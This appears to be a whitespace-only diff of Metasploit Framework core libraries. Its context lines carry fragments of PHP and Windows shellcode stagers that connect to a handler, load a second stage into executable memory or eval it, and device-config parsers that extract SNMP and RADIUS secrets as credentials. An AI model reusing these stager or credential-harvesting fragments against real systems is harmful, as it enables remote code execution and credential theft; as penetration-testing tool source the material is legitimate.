diff --git a/lib/msf/core/auxiliary/brocade.rb b/lib/msf/core/auxiliary/brocade.rb
index f3958f2638..2512c6a29a 100644
--- a/lib/msf/core/auxiliary/brocade.rb
+++ b/lib/msf/core/auxiliary/brocade.rb
@@ -44,7 +44,7 @@ module Auxiliary::Brocade login_object end
-
+
 def brocade_config_eater(thost, tport, config) # this is for brocade type devices.
@@ -104,7 +104,7 @@ module Auxiliary::Brocade end # snmp
- # Example lines:
+ # Example lines:
 # snmp-server community 1 $Si2^=d rw # these at times look base64 encoded, which they may be, but are also encrypted config.scan(/snmp-server community (?[\d]+) (?.+) (?rw|ro)/i).each do |result|
diff --git a/lib/msf/core/auxiliary/crand.rb b/lib/msf/core/auxiliary/crand.rb
index 9635306d07..4756ebc241 100644
--- a/lib/msf/core/auxiliary/crand.rb
+++ b/lib/msf/core/auxiliary/crand.rb
@@ -25,7 +25,7 @@ module Auxiliary::CRand def initialize(info = {}) super
-
+
 @randtbl = [ # we omit TYPE_3 from here, not needed
@@ -38,7 +38,7 @@ module Auxiliary::CRand -205601318, ]
- @unsafe_state = {
+ @unsafe_state = {
 "fptr" => SEP_3, "rptr" => 0, "state" => 0,
@@ -56,7 +56,7 @@ module Auxiliary::CRand seed = 1 end state[0] = seed
-
+
 dst = 0 word = seed kc = DEG_3
@@ -70,10 +70,10 @@ module Auxiliary::CRand dst += 1 state[dst] = word end
-
+
 @unsafe_state['fptr'] = @unsafe_state['rand_sep'] @unsafe_state['rptr'] = 0
-
+
 kc *= 10 kc -= 1 while (kc >= 0)
@@ -81,17 +81,17 @@ module Auxiliary::CRand kc -= 1 end end
-
- # Emulate the behaviour of C's rand
+
+ # Emulate the behaviour of C's rand
 def random_r buf = @unsafe_state state = buf['state']
-
+
 fptr = buf['fptr'] rptr = buf['rptr'] end_ptr = buf['end_ptr'] val = @randtbl[fptr] += @randtbl[rptr]
-
+
 result = (val >> 1) & 0x7fffffff fptr += 1 if (fptr >= end_ptr)
@@ -105,7 +105,7 @@ module Auxiliary::CRand end buf['fptr'] = fptr buf['rptr'] = rptr
-
+
 result end
diff --git a/lib/msf/core/auxiliary/juniper.rb b/lib/msf/core/auxiliary/juniper.rb
index 8b5d1ff582..2646cb12f7 100644
--- a/lib/msf/core/auxiliary/juniper.rb
+++ b/lib/msf/core/auxiliary/juniper.rb
@@ -75,7 +75,7 @@ module Auxiliary::Juniper end # snmp
- # Example lines:
+ # Example lines:
 # set snmp community "sales" Read-Write Trap-on traffic version v1 config.scan(/set snmp community "(?[a-z0-9]+)" (?Read-Write|Read-Only)/i).each do |result| snmp_community = result[0].strip
@@ -214,7 +214,7 @@ module Auxiliary::Juniper cred[:private_type] = :password cred[:service_name] = 'snmp' create_credential_and_login(cred)
- end
+ end
 config.scan(/radius-server \{[\s]+(?[0-9\.]{7,15}) secret "(?[^"]+)";/i).each do |result| radius_hash = result[1].strip
diff --git a/lib/msf/core/db_manager/ip_address.rb b/lib/msf/core/db_manager/ip_address.rb
index 2210782d33..b03d33a423 100644
--- a/lib/msf/core/db_manager/ip_address.rb
+++ b/lib/msf/core/db_manager/ip_address.rb
@@ -10,7 +10,7 @@ module Msf::DBManager::IPAddress Rex::Socket.is_ipv4?(addr) else false
- end
+ end
 end def ipv6_validator(addr)
@@ -20,7 +20,7 @@ module Msf::DBManager::IPAddress Rex::Socket.is_ipv6?(addr) else false
- end
+ end
 end def rfc3330_reserved(ip)
diff --git a/lib/msf/core/db_manager/workspace.rb b/lib/msf/core/db_manager/workspace.rb
index d62590a176..9ff4dccb3a 100644
--- a/lib/msf/core/db_manager/workspace.rb
+++ b/lib/msf/core/db_manager/workspace.rb
@@ -70,7 +70,7 @@ module Msf::DBManager::Workspace def delete_workspaces(opts) raise ArgumentError.new("The following options are required: :ids") if opts[:ids].nil?
-
+
 ::ActiveRecord::Base.connection_pool.with_connection { deleted = [] default_deleted = false
diff --git a/lib/msf/core/exploit/dns/client.rb b/lib/msf/core/exploit/dns/client.rb
index 687565eed3..24a3d3b348 100644
--- a/lib/msf/core/exploit/dns/client.rb
+++ b/lib/msf/core/exploit/dns/client.rb
@@ -37,7 +37,7 @@ module Client register_advanced_options( [
- OptString.new('DnsClientDefaultNS', [ false, "Specify the default to use for queries, space separated", '8.8.8.8 8.8.4.4' ]),
+ OptString.new('DnsClientDefaultNS', [ false, "Specify the default to use for queries, space separated", '8.8.8.8 8.8.4.4' ]),
 OptInt.new('DnsClientRetry', [ false, "Number of times to try to resolve a record if no response is received", 2]), OptInt.new('DnsClientRetryInterval', [ false, "Number of seconds to wait before doing a retry", 2]), OptBool.new('DnsClientReportARecords', [false, "Add hosts found via BRT and RVL to DB", true]),
@@ -204,7 +204,7 @@ module Client nameservers = datastore['NS'].split(/\s|,/) end
- invalid = nameservers.select { |ns| !Rex::Socket.dotted_ip?(ns) }
+ invalid = nameservers.select { |ns| !Rex::Socket.dotted_ip?(ns) }
 if !invalid.empty? raise "Nameservers must be IP addresses. The following were invalid: #{invalid.join(", ")}" end
diff --git a/lib/msf/core/exploit/dns/common.rb b/lib/msf/core/exploit/dns/common.rb
index 810172bdf2..0ab5b6c0b4 100644
--- a/lib/msf/core/exploit/dns/common.rb
+++ b/lib/msf/core/exploit/dns/common.rb
@@ -16,7 +16,7 @@ module Common MATCH_HOSTNAME = Rex::Proto::DNS::Constants::MATCH_HOSTNAME Packet = Rex::Proto::DNS::Packet
-
+
 end end end
diff --git a/lib/msf/core/exploit/exe.rb b/lib/msf/core/exploit/exe.rb
index e34f25eed3..e752a52e16 100644
--- a/lib/msf/core/exploit/exe.rb
+++ b/lib/msf/core/exploit/exe.rb
@@ -145,7 +145,7 @@ module Exploit::EXE exe_init_options(opts) plat = opts[:platform] pl = opts[:code]
-
+
 pl ||= payload.encoded #Ensure opts[:arch] is an array
diff --git a/lib/msf/core/exploit/java/rmi/util.rb b/lib/msf/core/exploit/java/rmi/util.rb
index 1cc87900a4..37d4cdebc7 100644
--- a/lib/msf/core/exploit/java/rmi/util.rb
+++ b/lib/msf/core/exploit/java/rmi/util.rb
@@ -85,12 +85,12 @@ module Msf # @return [Byte, nil] the extracted byte if success, nil otherwise def extract_byte(io) byte_raw = io.read(1)
-
+
 unless byte_raw && byte_raw.length == 1 return nil end byte = byte_raw.unpack('C')[0]
-
+
 byte end
@@ -120,7 +120,7 @@ module Msf unless ref && (ref == 'UnicastRef' || ref == 'UnicastRef2') return nil end
-
+
 if ref == 'UnicastRef2' form = extract_byte(io)
diff --git a/lib/msf/core/exploit/socket_server.rb b/lib/msf/core/exploit/socket_server.rb
index 65051f5616..b89a066e28 100644
--- a/lib/msf/core/exploit/socket_server.rb
+++ b/lib/msf/core/exploit/socket_server.rb
@@ -156,10 +156,10 @@ protected raise(RuntimeError, "Socket Server Comm (Session #{srv_comm}) does not exist") unless comm raise(RuntimeError, "Socket Server Comm (Session #{srv_comm}) does not implement Rex::Socket::Comm") unless comm.is_a? ::Rex::Socket::Comm when nil, ''
- comm = nil
+ comm = nil
 else raise(RuntimeError, "SocketServer Comm '#{srv_comm}' is invalid")
- end
+ end
 comm end
diff --git a/lib/msf/core/module/alert.rb b/lib/msf/core/module/alert.rb
index 75c43d6c1d..ccaf96a991 100644
--- a/lib/msf/core/module/alert.rb
+++ b/lib/msf/core/module/alert.rb
@@ -15,7 +15,7 @@ module Msf::Module::Alert # the module is about to start running, or when the module generates its # output. #
- # @param msg [String] an optional warning message
+ # @param msg [String] an optional warning message
 # @param block [Proc] an optional block that will be executed in the # context of the module instance at alert time to generate the warning # message. If provided the msg parameter is ignored.
@@ -30,7 +30,7 @@ module Msf::Module::Alert # the module is about to start running, or when the module generates its # output. Adding an error will cause {#is_usable} to return `false`. #
- # @param msg [String] an optional error message
+ # @param msg [String] an optional error message
 # @param block [Proc] an optional block that will be executed in the # context of the module instance at alert time to generate the error # message. If provided the msg parameter is ignored.
@@ -109,7 +109,7 @@ module Msf::Module::Alert # command, when the module is about to start running, or when the module # generates its output. #
- # @param msg [String] an optional warning message
+ # @param msg [String] an optional warning message
 # @param block [Proc] an optional block that will be executed in the # context of the module instance at alert time to generate the warning # message. If provided the msg parameter is ignored.
@@ -125,7 +125,7 @@ module Msf::Module::Alert # generates its output. Adding an error will cause {#is_usable} to return # `false`. #
- # @param msg [String] an optional error message
+ # @param msg [String] an optional error message
 # @param block [Proc] an optional block that will be executed in the # context of the module instance at alert time to generate the error # message. If provided the msg parameter is ignored.
@@ -164,7 +164,7 @@ module Msf::Module::Alert # the context of this module instance and returns a flattened list of strings. # (see {ClassMethods#get_alerts}) # @param [Symbol] the alert level to return
- # @return [Array]
+ # @return [Array]
 def get_alerts(level) self.alerts ||= {} self.alerts[level] ||= []
diff --git a/lib/msf/core/payload/php/bind_tcp.rb b/lib/msf/core/payload/php/bind_tcp.rb
index 7dac6fe441..7a7be244ca 100644
--- a/lib/msf/core/payload/php/bind_tcp.rb
+++ b/lib/msf/core/payload/php/bind_tcp.rb
@@ -109,14 +109,14 @@ while (strlen($b) < $len) { # Set up the socket for the main stage to use. $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type;
-if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval'))
-{
- $suhosin_bypass=create_function('', $b);
- $suhosin_bypass();
-}
-else
-{
- eval($b);
+if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval'))
+{
+ $suhosin_bypass=create_function('', $b);
+ $suhosin_bypass();
+}
+else
+{
+ eval($b);
 } die();^ end
diff --git a/lib/msf/core/payload/php/reverse_tcp.rb b/lib/msf/core/payload/php/reverse_tcp.rb
index 5cc7daae8c..baf6583022 100644
--- a/lib/msf/core/payload/php/reverse_tcp.rb
+++ b/lib/msf/core/payload/php/reverse_tcp.rb
@@ -102,14 +102,14 @@ while (strlen($b) < $len) { # Set up the socket for the main stage to use. $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type;
-if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval'))
-{
- $suhosin_bypass=create_function('', $b);
- $suhosin_bypass();
-}
-else
-{
- eval($b);
+if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval'))
+{
+ $suhosin_bypass=create_function('', $b);
+ $suhosin_bypass();
+}
+else
+{
+ eval($b);
 } die();^ end
diff --git a/lib/msf/core/payload/php/send_uuid.rb b/lib/msf/core/payload/php/send_uuid.rb
index 25a29c5477..2489fda155 100644
--- a/lib/msf/core/payload/php/send_uuid.rb
+++ b/lib/msf/core/payload/php/send_uuid.rb
@@ -25,7 +25,7 @@ module Payload::Php::SendUUID uuid_raw = uuid.to_raw.chars.map { |c| '\x%.2x' % c.ord }.join('') php = %Q^$u="#{uuid_raw}";
-switch (#{sock_type}) {
+switch (#{sock_type}) {
 case 'stream': fwrite(#{sock_var}, $u); break; case 'socket': socket_write(#{sock_var}, $u); break; }
diff --git a/lib/msf/core/payload/transport_config.rb b/lib/msf/core/payload/transport_config.rb
index a697c55226..28f7b8b29e 100644
--- a/lib/msf/core/payload/transport_config.rb
+++ b/lib/msf/core/payload/transport_config.rb
@@ -120,7 +120,7 @@ module Msf::Payload::TransportConfig lhost: '.', uri: "/#{ds['PIPENAME']}", }.merge(timeout_config(opts))
-
+
 end
diff --git a/lib/msf/core/payload/windows/bind_named_pipe.rb b/lib/msf/core/payload/windows/bind_named_pipe.rb
index d14ba3163d..e9ae78319d 100644
--- a/lib/msf/core/payload/windows/bind_named_pipe.rb
+++ b/lib/msf/core/payload/windows/bind_named_pipe.rb
@@ -110,7 +110,7 @@ module Payload::Windows::BindNamedPipe # # hPipe must be in edi. eax will contain WriteFile return value
- #
+ #
 def asm_send_uuid(uuid=nil) uuid ||= generate_payload_uuid uuid_raw = uuid.to_raw
@@ -155,7 +155,7 @@ module Payload::Windows::BindNamedPipe push #{chunk_size} ; nInBufferSize push #{chunk_size} ; nOutBufferSize push 255 ; nMaxInstances (PIPE_UNLIMITED_INSTANCES). in case pipe isn't released
- push #{pipe_mode} ; dwPipeMode
+ push #{pipe_mode} ; dwPipeMode
 push 3 ; dwOpenMode (PIPE_ACCESS_DUPLEX) call get_pipe_name ; lpName db "#{full_pipe_name}", 0x00
diff --git a/lib/msf/core/payload/windows/powershell.rb b/lib/msf/core/payload/windows/powershell.rb
index c09cea4ffe..23c5661a23 100644
--- a/lib/msf/core/payload/windows/powershell.rb
+++ b/lib/msf/core/payload/windows/powershell.rb
@@ -44,7 +44,7 @@ module Payload::Windows::Powershell script_in.gsub!('LHOST_REPLACE', lhost.to_s) script = Rex::Powershell::Command.compress_script(script_in)
- command_args = {
+ command_args = {
 noprofile: true, windowstyle: 'hidden', noninteractive: true,
diff --git a/lib/msf/core/payload/windows/reverse_named_pipe.rb b/lib/msf/core/payload/windows/reverse_named_pipe.rb
index 1049b96519..827abfb76f 100644
--- a/lib/msf/core/payload/windows/reverse_named_pipe.rb
+++ b/lib/msf/core/payload/windows/reverse_named_pipe.rb
@@ -73,7 +73,7 @@ module Payload::Windows::ReverseNamedPipe pop ebp #{asm_reverse_named_pipe(opts)} ^
-
+
 #"\xCC" + Metasm::Shellcode.assemble(Metasm::X86.new, combined_asm).encode_string Metasm::Shellcode.assemble(Metasm::X86.new, combined_asm).encode_string end
diff --git a/lib/msf/core/payload/windows/reverse_tcp.rb b/lib/msf/core/payload/windows/reverse_tcp.rb
index 0c679c11de..a7d7391302 100644
--- a/lib/msf/core/payload/windows/reverse_tcp.rb
+++ b/lib/msf/core/payload/windows/reverse_tcp.rb
@@ -168,7 +168,7 @@ module Payload::Windows::ReverseTcp ; to cater for both IPv4 and IPv6 loop push_0_loop
- ; bind to 0.0.0.0/[::], pushed above
+ ; bind to 0.0.0.0/[::], pushed above
 push #{encoded_bind_port} ; family AF_INET and port number mov esi, esp ; save a pointer to sockaddr_in struct push #{sockaddr_size} ; length of the sockaddr_in struct (we only set the first 8 bytes, the rest aren't used)
@@ -181,7 +181,7 @@ module Payload::Windows::ReverseTcp mov esi, esp ^ end
-
+
 asm << %Q^ try_connect: push 16 ; length of the sockaddr struct
diff --git a/lib/msf/core/payload/windows/x64/bind_named_pipe.rb b/lib/msf/core/payload/windows/x64/bind_named_pipe.rb
index 0b36bf5a1a..1e27a21ad8 100644
--- a/lib/msf/core/payload/windows/x64/bind_named_pipe.rb
+++ b/lib/msf/core/payload/windows/x64/bind_named_pipe.rb
@@ -67,7 +67,7 @@ module Payload::Windows::BindNamedPipe_x64 def generate_bind_named_pipe(opts={}) combined_asm = %Q^ cld ; Clear the direction flag.
- and rsp, ~0xF ; Ensure RSP is 16 byte aligned
+ and rsp, ~0xF ; Ensure RSP is 16 byte aligned
 call start ; Call start, this pushes the address of 'api_call' onto the stack. #{asm_block_api} start:
@@ -111,7 +111,7 @@ module Payload::Windows::BindNamedPipe_x64 # # hPipe must be in rdi. rax will contain WriteFile return value
- #
+ #
 def asm_send_uuid(uuid=nil) uuid ||= generate_payload_uuid uuid_raw = uuid.to_raw
@@ -220,7 +220,7 @@ module Payload::Windows::BindNamedPipe_x64 asm << %Q^ ; read size of second stage mov rcx, rdi ; hPipe
- push 0 ;
+ push 0 ;
 mov rdx, rsp ; lpBuffer mov r8, 4 ; nNumberOfBytesToRead push 0
@@ -246,9 +246,9 @@ module Payload::Windows::BindNamedPipe_x64 ; Alloc a RWX buffer for the second stage pop rsi ; pop off the second stage length mov esi, esi ; only use the lower-order 32 bits for the size
- push 0x40 ;
+ push 0x40 ;
 pop r9 ; PAGE_EXECUTE_READWRITE
- push 0x1000 ;
+ push 0x1000 ;
 pop r8 ; MEM_COMMIT mov rdx, rsi ; the newly recieved second stage length. xor rcx, rcx ; NULL as we dont care where the allocation is.
@@ -338,7 +338,7 @@ module Payload::Windows::BindNamedPipe_x64 call get_kernel32_name db "kernel32", 0x00 get_kernel32_name:
- pop rcx ;
+ pop rcx ;
 mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'GetModuleHandleA')} call rbp ; GetModuleHandleA("kernel32")
diff --git a/lib/msf/core/payload/windows/x64/bind_tcp.rb b/lib/msf/core/payload/windows/x64/bind_tcp.rb
index c31c92d6ba..6485f4ad47 100644
--- a/lib/msf/core/payload/windows/x64/bind_tcp.rb
+++ b/lib/msf/core/payload/windows/x64/bind_tcp.rb
@@ -216,7 +216,7 @@ module Payload::Windows::BindTcp_x64 sub rsp, 16 ; alloc some space (16 bytes) on stack for to hold the second stage length mov rdx, rsp ; set pointer to this buffer xor r9, r9 ; flags
- push 4 ;
+ push 4 ;
 pop r8 ; length = sizeof( DWORD ); mov rcx, rdi ; the saved socket mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'recv')}
@@ -226,9 +226,9 @@ module Payload::Windows::BindTcp_x64 ; Alloc a RWX buffer for the second stage pop rsi ; pop off the second stage length mov esi, esi ; only use the lower-order 32 bits for the size
- push 0x40 ;
+ push 0x40 ;
 pop r9 ; PAGE_EXECUTE_READWRITE
- push 0x1000 ;
+ push 0x1000 ;
 pop r8 ; MEM_COMMIT mov rdx, rsi ; the newly recieved second stage length. xor rcx, rcx ; NULL as we dont care where the allocation is.
diff --git a/lib/msf/core/payload/windows/x64/block_api.rb b/lib/msf/core/payload/windows/x64/block_api.rb
index 1a16cfcadb..1de9a25aff 100644
--- a/lib/msf/core/payload/windows/x64/block_api.rb
+++ b/lib/msf/core/payload/windows/x64/block_api.rb
@@ -27,7 +27,7 @@ module Payload::Windows::BlockApi_x64 mov rdx, [rdx+32] ; Get the first module from the InMemoryOrder module list next_mod: ; mov rsi, [rdx+80] ; Get pointer to modules name (unicode string)
- movzx rcx, word [rdx+74] ; Set rcx to the length we want to check
+ movzx rcx, word [rdx+74] ; Set rcx to the length we want to check
 xor r9, r9 ; Clear r9 which will store the hash of the module name loop_modname: ; xor rax, rax ; Clear rax
@@ -42,12 +42,12 @@ module Payload::Windows::BlockApi_x64 ; We now have the module hash computed push rdx ; Save the current position in the module list for later push r9 ; Save the current module hash for later
- ; Proceed to itterate the export address table,
+ ; Proceed to itterate the export address table,
 mov rdx, [rdx+32] ; Get this modules base address mov eax, dword [rdx+60] ; Get PE header add rax, rdx ; Add the modules base address
- cmp word [rax+24], 0x020B ; is this module actually a PE64 executable?
- ; this test case covers when running on wow64 but in a native x64 context via nativex64.asm and
+ cmp word [rax+24], 0x020B ; is this module actually a PE64 executable?
+ ; this test case covers when running on wow64 but in a native x64 context via nativex64.asm and
 ; their may be a PE32 module present in the PEB's module list, (typicaly the main module). ; as we are using the win64 PEB ([gs:96]) we wont see the wow64 modules present in the win32 PEB ([fs:48]) jne get_next_mod1 ; if not, proceed to the next module
@@ -56,7 +56,7 @@ module Payload::Windows::BlockApi_x64 jz get_next_mod1 ; If no EAT present, process the next module add rax, rdx ; Add the modules base address push rax ; Save the current modules EAT
- mov ecx, dword [rax+24] ; Get the number of function names
+ mov ecx, dword [rax+24] ; Get the number of function names
 mov r8d, dword [rax+32] ; Get the rva of the function names add r8, rdx ; Add the modules base address ; Computing the module hash + function hash
@@ -75,14 +75,14 @@ module Payload::Windows::BlockApi_x64 cmp al, ah ; Compare AL (the next byte from the name) to AH (null) jne loop_funcname ; If we have not reached the null terminator, continue add r9, [rsp+8] ; Add the current module hash to the function hash
- cmp r9d, r10d ; Compare the hash to the one we are searchnig for
+ cmp r9d, r10d ; Compare the hash to the one we are searchnig for
 jnz get_next_func ; Go compute the next function hash if we have not found it ; If found, fix up stack, call the function and then value else compute the next one... pop rax ; Restore the current modules EAT
- mov r8d, dword [rax+36] ; Get the ordinal table rva
+ mov r8d, dword [rax+36] ; Get the ordinal table rva
 add r8, rdx ; Add the modules base address mov cx, [r8+2*rcx] ; Get the desired functions ordinal
- mov r8d, dword [rax+28] ; Get the function addresses table rva
+ mov r8d, dword [rax+28] ; Get the function addresses table rva
 add r8, rdx ; Add the modules base address mov eax, dword [r8+4*rcx]; Get the desired functions RVA add rax, rdx ; Add the modules base address to get the functions actual VA
diff --git a/lib/msf/core/payload/windows/x64/reverse_named_pipe.rb b/lib/msf/core/payload/windows/x64/reverse_named_pipe.rb
index b04ba63f75..1383e9deb1 100644
--- a/lib/msf/core/payload/windows/x64/reverse_named_pipe.rb
+++ b/lib/msf/core/payload/windows/x64/reverse_named_pipe.rb
@@ -62,7 +62,7 @@ module Payload::Windows::ReverseNamedPipe_x64 def generate_reverse_named_pipe(opts={}) combined_asm = %Q^ cld ; Clear the direction flag.
- and rsp, ~0xF ; Ensure RSP is 16 byte aligned
+ and rsp, ~0xF ; Ensure RSP is 16 byte aligned
 call start ; Call start, this pushes the address of 'api_call' onto the stack. #{asm_block_api} start:
@@ -193,15 +193,15 @@ module Payload::Windows::ReverseNamedPipe_x64 end asm << %Q^
-
+
 ; Alloc a RWX buffer for the second stage add rsp, 0x30 ; slight stack adjustment pop rsi ; pop off the second stage length pop rax ; line the stack up again mov esi, esi ; only use the lower-order 32 bits for the size
- push 0x40 ;
+ push 0x40 ;
 pop r9 ; PAGE_EXECUTE_READWRITE
- push 0x1000 ;
+ push 0x1000 ;
 pop r8 ; MEM_COMMIT mov rdx, rsi ; the newly recieved second stage length. xor rcx, rcx ; NULL as we dont care where the allocation is.
diff --git a/lib/msf/core/payload/windows/x64/reverse_tcp.rb b/lib/msf/core/payload/windows/x64/reverse_tcp.rb
index 249918e72d..90dc9dd9bc 100644
--- a/lib/msf/core/payload/windows/x64/reverse_tcp.rb
+++ b/lib/msf/core/payload/windows/x64/reverse_tcp.rb
@@ -63,7 +63,7 @@ module Payload::Windows::ReverseTcp_x64 def generate_reverse_tcp(opts={}) combined_asm = %Q^ cld ; Clear the direction flag.
- and rsp, ~0xF ; Ensure RSP is 16 byte aligned
+ and rsp, ~0xF ; Ensure RSP is 16 byte aligned
 call start ; Call start, this pushes the address of 'api_call' onto the stack. #{asm_block_api} start:
@@ -206,7 +206,7 @@ module Payload::Windows::ReverseTcp_x64 ; second stage length mov rdx, rsp ; set pointer to this buffer xor r9, r9 ; flags
- push 4 ;
+ push 4 ;
 pop r8 ; length = sizeof( DWORD ); mov rcx, rdi ; the saved socket mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'recv')}
@@ -228,9 +228,9 @@ module Payload::Windows::ReverseTcp_x64 ; Alloc a RWX buffer for the second stage pop rsi ; pop off the second stage length mov esi, esi ; only use the lower-order 32 bits for the size
- push 0x40 ;
+ push 0x40 ;
 pop r9 ; PAGE_EXECUTE_READWRITE
- push 0x1000 ;
+ push 0x1000 ;
 pop r8 ; MEM_COMMIT mov rdx, rsi ; the newly recieved second stage length. xor rcx, rcx ; NULL as we dont care where the allocation is.
diff --git a/lib/msf/core/post/linux/kernel.rb b/lib/msf/core/post/linux/kernel.rb
index 389047fcb2..19f80a484f 100644
--- a/lib/msf/core/post/linux/kernel.rb
+++ b/lib/msf/core/post/linux/kernel.rb
@@ -188,7 +188,7 @@ module Kernel # @return [Boolean] # def unprivileged_bpf_disabled?
- cmd_exec('cat /proc/sys/kernel/unprivileged_bpf_disabled').to_s.strip.eql? '1'
+ cmd_exec('cat /proc/sys/kernel/unprivileged_bpf_disabled').to_s.strip.eql? '1'
 rescue raise 'Could not determine kernel.unprivileged_bpf_disabled status' end
@@ -199,7 +199,7 @@ module Kernel # @return [Boolean] # def kptr_restrict?
- cmd_exec('cat /proc/sys/kernel/kptr_restrict').to_s.strip.eql? '1'
+ cmd_exec('cat /proc/sys/kernel/kptr_restrict').to_s.strip.eql? '1'
 rescue raise 'Could not determine kernel.kptr_restrict status' end
@@ -210,7 +210,7 @@ module Kernel # @return [Boolean] # def dmesg_restrict?
- cmd_exec('cat /proc/sys/kernel/dmesg_restrict').to_s.strip.eql? '1'
+ cmd_exec('cat /proc/sys/kernel/dmesg_restrict').to_s.strip.eql? '1'
 rescue raise 'Could not determine kernel.dmesg_restrict status' end
diff --git a/lib/msf/core/post/windows/dotnet.rb b/lib/msf/core/post/windows/dotnet.rb
index ed6c0e0330..49e60c3cc0 100644
--- a/lib/msf/core/post/windows/dotnet.rb
+++ b/lib/msf/core/post/windows/dotnet.rb
@@ -14,7 +14,7 @@ module Msf::Post::Windows::Dotnet # actual version, rather than the over-arching release # An alternative would be to query for it, and catch the exception. #
-
+
 def search_for_version(dotnet_subkey) dotnet_version = nil begin
@@ -57,7 +57,7 @@ module Msf::Post::Windows::Dotnet end return exact_version end
-
+
 # # 'Public' function that returns a list of all .NET versions on # a windows host
@@ -76,7 +76,7 @@ module Msf::Post::Windows::Dotnet if temp_key[0] == 'v' key = 'HKLM\\SOFTWARE\\Microsoft\NET Framework Setup\\NDP\\' + temp_key dotnet_version = get_versionception(key)
- unless dotnet_version.nil?
+ unless dotnet_version.nil?
 ret_val << dotnet_version end end
diff --git a/lib/msf/core/rpc/v10/rpc_db.rb b/lib/msf/core/rpc/v10/rpc_db.rb
index 6f3f158c65..abc1b2925e 100644
--- a/lib/msf/core/rpc/v10/rpc_db.rb
+++ b/lib/msf/core/rpc/v10/rpc_db.rb
@@ -279,15 +279,15 @@ public end updated_at = nil
- pass = nil
+ pass = nil
 type = nil
-
+
 unless cred.private.nil?
- updated_at = cred.private.updated_at.to_i
+ updated_at = cred.private.updated_at.to_i
 pass = cred.private.data.to_s type = cred.private.type.to_s else
- updated_at = cred.public.updated_at.to_i
+ updated_at = cred.public.updated_at.to_i
 end ret[:creds] << {
diff --git a/lib/msf/core/session/interactive.rb b/lib/msf/core/session/interactive.rb
index 6885b1fa5f..77aa0f5bba 100644
--- a/lib/msf/core/session/interactive.rb
+++ b/lib/msf/core/session/interactive.rb
@@ -110,7 +110,7 @@ protected def _interrupt begin intent = user_want_abort?
- # Judge the user wants to abort the reverse shell session
+ # Judge the user wants to abort the reverse shell session
 # Or just want to abort the process running on the target machine # If the latter, just send ASCII Control Character \u0003 (End of Text) to the socket fd # The character will be handled by the line dicipline program of the pseudo-terminal on target machine